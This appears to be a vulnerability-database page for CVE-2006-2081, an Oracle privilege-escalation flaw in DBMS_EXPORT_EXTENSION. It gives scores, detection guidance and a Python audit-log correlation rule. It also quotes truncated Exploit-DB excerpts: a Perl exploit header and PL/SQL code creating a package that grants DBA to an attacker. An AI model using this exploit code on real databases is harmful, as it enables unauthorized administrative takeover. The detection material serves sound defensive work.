CVE-2006-2081
published 2006-04-27
CVE-2006-2081: Oracle Database Server 10g Release 2 allows local users to execute arbitrary SQL queries via the GET_DOMAIN_INDEX_METADATA function in the…
Priority P339 · medium · 4.6 · CVSS 2.0
AV:L/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 21.56% (97.3th percentile)
Oracle Database Server 10g Release 2 allows local users to execute arbitrary SQL queries via the GET_DOMAIN_INDEX_METADATA function in the DBMS_EXPORT_EXTENSION package. NOTE: this issue was originally linked to DB05 (CVE-2006-1870), but a reliable third party has claimed that it is not the same issue. Based on details of the problem, the primary issue appears to be insecure privileges that facilitate the introduction of SQL in a way that is not related to special characters, so this is not "SQL injection" per se.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | database_server | — | — |
| oracle | database_server | — | — |
| oracle | database_server | — | — |
| oracle | database_server | — | — |
| oracle | database_server | — | — |
Detection & IOCs (extracted from sources)
- Monitor Oracle DB audit logs for calls to SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA by non-privileged or unexpected users, especially when INDEX_SCHEMA or TYPE_SCHEMA reference user-controlled packages.
- Detect creation of Oracle packages with AUTHID CURRENT_USER that implement the ODCIIndexGetMetadata function; this is the exploit's mechanism for injecting privileged SQL execution.
- Alert on GRANT DBA statements executed via EXECUTE IMMEDIATE inside an autonomous transaction block, which is the privilege escalation payload used by this exploit.
- Flag Oracle sessions where a low-privileged user creates a package named MYBADPACKAGE or BUNKERPKG (or any package implementing ODCIIndexGetMetadata with autonomous_transaction) followed by a call to DBMS_EXPORT_EXTENSION.
- The Metasploit auxiliary module path modules/auxiliary/sqli/oracle/dbms_export_extension.rb can be used to test for this vulnerability; detect its characteristic SQL patterns in Oracle network traffic or audit logs.
- The vulnerability affects Oracle 9i and 10g (including 10gR1 and 10gR2); exploitation requires a valid low-privileged database account, so it is not remotely exploitable without credentials.
- The root cause is insecure privileges on the DBMS_EXPORT_EXTENSION package rather than classic SQL injection via special characters; detection rules targeting SQL metacharacter injection will not catch this attack.
- This CVE was originally linked to DB05 (CVE-2006-1870) but is confirmed to be a distinct issue; do not conflate detection signatures for the two vulnerabilities.
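
One way to turn the audit-log bullets above into a correlation rule, as an added example that is not part of the original page or of any indexed source. It assumes audit records have already been parsed into a user, a timestamp and the SQL text; the field names, the `correlate` function and the sample records are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Patterns follow the detection bullets; Oracle keywords are case-insensitive.
HOOK_PKG = re.compile(
    r"CREATE\s+(?:OR\s+REPLACE\s+)?PACKAGE\s+(?:BODY\s+)?([\w$#.]+).*?ODCIIndexGetMetadata",
    re.I | re.S)
EXPORT_CALL = re.compile(r"DBMS_EXPORT_EXTENSION\s*\.\s*GET_DOMAIN_INDEX_METADATA", re.I)
MARKERS = {
    "authid_current_user": re.compile(r"AUTHID\s+CURRENT_USER", re.I),
    "autonomous_transaction": re.compile(r"PRAGMA\s+AUTONOMOUS_TRANSACTION", re.I),
    "grant_dba_dynamic": re.compile(r"EXECUTE\s+IMMEDIATE\s+'\s*GRANT\s+DBA\b", re.I),
}

def correlate(events, window=timedelta(hours=1)):
    """Alert on each GET_DOMAIN_INDEX_METADATA call that follows, within `window`
    and by the same user, creation of a package defining ODCIIndexGetMetadata."""
    pending = {}  # user -> (time of latest matching CREATE, package names, markers seen)
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        user, sql = ev["user"], ev["sql"]
        m = HOOK_PKG.search(sql)
        if m:
            _, pkgs, marks = pending.get(user, (None, set(), set()))
            marks = marks | {name for name, rx in MARKERS.items() if rx.search(sql)}
            pending[user] = (ev["ts"], pkgs | {m.group(1).upper()}, marks)
        elif EXPORT_CALL.search(sql) and user in pending:
            t0, pkgs, marks = pending[user]
            if ev["ts"] - t0 <= window:
                alerts.append({"user": user, "call_ts": ev["ts"],
                               "packages": sorted(pkgs), "markers": sorted(marks)})
    return alerts

T = datetime(2006, 4, 27, 10, 0, 0)
SAMPLE = [  # constructed audit records, not captured from a real system
    {"ts": T, "user": "APP_USER", "sql": "CREATE OR REPLACE PACKAGE DEMO_PKG AUTHID CURRENT_USER "
        "IS FUNCTION ODCIIndexGetMetadata(...) RETURN NUMBER; END;"},
    {"ts": T + timedelta(seconds=5), "user": "APP_USER", "sql": "CREATE OR REPLACE PACKAGE BODY DEMO_PKG "
        "IS FUNCTION ODCIIndexGetMetadata(...) RETURN NUMBER IS pragma autonomous_transaction; "
        "BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO APP_USER'; COMMIT; RETURN(1); END; END;"},
    {"ts": T + timedelta(seconds=9), "user": "APP_USER",
     "sql": "BEGIN x := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(...); END;"},
    {"ts": T + timedelta(seconds=20), "user": "EXP_ADMIN",  # call with no preceding package: no alert
     "sql": "BEGIN x := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(...); END;"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE):
        print(alert)
```

Because the rule keys on the function name and the package call rather than on quote or comment characters, it covers the case the bullets warn that metacharacter-based SQL injection signatures miss.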
GHSA
CVE-2006-1870 [MEDIUM] GHSA-7jg3-5w3h-9634: Unspecified vulnerability in Oracle Database Server 8
ghsa_unreviewed · 2022-05-01 · CVSS 4.6
Unspecified vulnerability in Oracle Database Server 8.1.7.4, 9.0.1.5, 9.2.0.7, 10.1.0.5, and 10.2.0.2 has unknown impact and attack vectors in the Export component, aka Vuln# DB05. NOTE: details are unavailable from Oracle, but as of 20060427, they have not publicly commented on whether DB05 is the same issue as CVE-2006-2081.
GHSA
CVE-2006-3702 [MEDIUM] GHSA-9f9f-mcqm-2v26: Multiple unspecified vulnerabilities in Oracle Database 8
ghsa_unreviewed · 2022-05-01 · CVSS 4.6
Multiple unspecified vulnerabilities in Oracle Database 8.1.7.4, 9.0.1.5, 9.2.0.7, 10.1.0.5, and 10.2.0.2 have unknown impact and attack vectors, aka Oracle Vuln# (1) DB06 in Export; (2) DB08, (3) DB09, (4) DB10, (5) DB11, (6) DB12, (7) DB13, (8) DB14, and (9) DBC01 for OCI; (10) DB16 for Query Rewrite/Summary Mgmt; (11) DB17, (12) DB18, (13) DB19, (14) DBC02, (15) DBC03, and (16) DBC04 for RPC; and (17) DB20 for Semantic Analysis. NOTE: as of 20060719, Oracle has not disputed third party claims that DB06 is related to "SQL injection" using DBMS_EXPORT_EXTENSION with a modified ODCIIndexGetMetadata routine and a call to GET_DOMAIN_INDEX_METADATA, in which case DB06 might be CVE-2006-2081.
GHSA
CVE-2006-2081 [CRITICAL] GHSA-3r8p-382h-8p7p: Oracle Database Server 10g Release 2 allows local users to execute arbitrary SQL queries via the GET_DOMAIN_INDEX_METADATA function in the DBMS_EXPORT
ghsa_unreviewed · 2022-05-01 · CVSS 9.0
Oracle Database Server 10g Release 2 allows local users to execute arbitrary SQL queries via the GET_DOMAIN_INDEX_METADATA function in the DBMS_EXPORT_EXTENSION package. NOTE: this issue was originally linked to DB05 (CVE-2006-1870), but a reliable third party has claimed that it is not the same issue. Based on details of the problem, the primary issue appears to be insecure privileges that facilitate the introduction of SQL in a way that is not related to special characters, so this is not "SQL injection" per se.
No detection rules found.
Exploit-DB
CVE-2006-2505 Oracle 9i/10g - DBMS_EXPORT_EXTENSION SQL Injection
exploitdb · 2007-02-05
---
#!/usr/bin/perl
#
# Remote Oracle dbms_export_extension exploit (any version)
# Grant or revoke dba permission to unprivileged user
#
# Tested on Oracle 10g - Release 10.2.0.1.0
# Oracle 9i - Release 9.2.0.2.0
#
# REF: https://www.securityfocus.com/bid/17699
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Sun Feb 4 15:53:04 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
use warnings;
use strict;
use DBI;
use DBD::Oracle;
use Getopt::Std;
use vars qw/ %opt /;
sub usage {
print -s -u -p -g|-r
Options:
-h target server address
-s target sid name
-u user
-p password
-g|-r (g)rant dba to user | (r)evoke dba from user
USAGE
exit 0
}
my $opt_string = 'h:s:

Exploit-DB
CVE-2006-2505 Oracle 10g Release 2 - 'DBMS_EXPORT_EXTENSION' SQL
exploitdb · 2006-04-26
---
/* 0day, description is wrong. /str0ke */
/*
* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
*
* Patch your database now!
*
* by N1V1Hd $3c41r3
*
*/
CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER;
END;
/
CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER
IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
COMMIT;
RETURN(1);
END;
END;
/
DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION

Metasploit
Oracle DB SQL Injection via DBMS_EXPORT_EXTENSION
This module will escalate an Oracle DB user to DBA by exploiting a SQL injection bug in the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA package. Note: This module has been tested against 9i, 10gR1 and 10gR2.
No writeups or analysis indexed.
- http://secunia.com/advisories/19860
- http://securityreason.com/securityalert/802
- http://securitytracker.com/id?1015999
- http://www.kb.cert.org/vuls/id/932124
- http://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.html
- http://www.securityfocus.com/archive/1/431353/100/0/threaded
- http://www.securityfocus.com/archive/1/432078/100/0/threaded
- http://www.securityfocus.com/archive/1/432354/100/0/threaded
- http://www.securityfocus.com/archive/1/432355/100/0/threaded
- http://www.securityfocus.com/archive/1/432632/30/5250/threaded
- http://www.securityfocus.com/bid/17699
- https://exchange.xforce.ibmcloud.com/vulnerabilities/26048
Published: 2006-04-27